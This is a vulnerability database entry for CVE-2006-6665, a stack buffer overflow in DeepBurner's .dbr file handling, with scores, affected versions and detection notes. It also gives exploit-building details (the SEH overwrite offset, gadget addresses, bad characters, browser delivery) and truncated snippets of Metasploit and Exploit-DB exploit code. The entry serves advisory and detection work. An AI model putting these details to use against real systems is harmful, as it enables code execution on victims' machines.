CVE-2006-6665
Published 2006-12-20
Priority P4 32 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 29.37% (97.9th percentile)
Buffer overflow in Astonsoft DeepBurner Pro and Free 1.8.0 and earlier allows user-assisted remote attackers to execute arbitrary code via a long file name tag in a dbr file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| astonsoft | deepburner | <= 1.8.0 | — |
Detection & IOCs (extracted from sources)
- The SEH overwrite occurs at offset 272 bytes into the path field of a .dbr file; a short jump of 0x40 bytes is used to skip over the SEH record to reach shellcode.
- The SEH overwrite uses a pop/pop/ret gadget from BASS.dll (DeepBurner 1.8.0) at 0x10017928; detection should flag .dbr files whose path attribute exceeds 272 bytes.
- The Metasploit module uses a p/p/r gadget from basswma.dll v2.2.0.3 at 0x101021f8; monitor for DeepBurner loading basswma.dll and crashing on SEH chain traversal.
- Exploit .dbr files embed XML-encoded shellcode in the path attribute of a <file> tag; look for .dbr files with path attributes containing &#x hex-encoded sequences of length > 272 characters.
- The DBR file extension is registered to DeepBurner, making drive-by browser delivery possible; monitor browser processes spawning DeepBurner with a .dbr argument from a temp/download directory.
- Known bad characters for shellcode in this exploit are 0x00, 0x3c (<), 0x3e (>), 0x0a, 0x0d, 0x22 ("), 0x2F (/); IDS rules should look for long runs of non-XML-special bytes in the path attribute.
- The Metasploit module targets versions 1.9.0.228 and 1.8.0; the payload space is limited to 512 bytes with a stack adjustment of -3500 and NOP generation disabled.
No detection rules found.
Exploit-DB
AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)
exploitdb·2010-09-20
---
##
# $Id: deepburner_path.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'AstonSoft DeepBurner (DBR File) Path Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in versions 1.9.0.228,
1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via
Exploit-DB
AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
exploitdb·2006-12-19
---
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ __|_ \
\/ \/ \/ \/ 18\12\06 \/ |__| \/ \/
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP [Happy holidays to everybody]
* MxM .mmm
* W"W """
[i] Title: DeepBurner
#include
#include
#include
// Exploit internals, change only if you know what you are doing
#define BUFFSIZE 1000
//
Metasploit
AstonSoft DeepBurner (DBR File) Path Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extension is registered to DeepBurner.
No writeups or analysis indexed.
- http://secunia.com/advisories/23367
- http://www.securityfocus.com/bid/21657
- http://www.vupen.com/english/advisories/2006/5066
- https://www.exploit-db.com/exploits/2950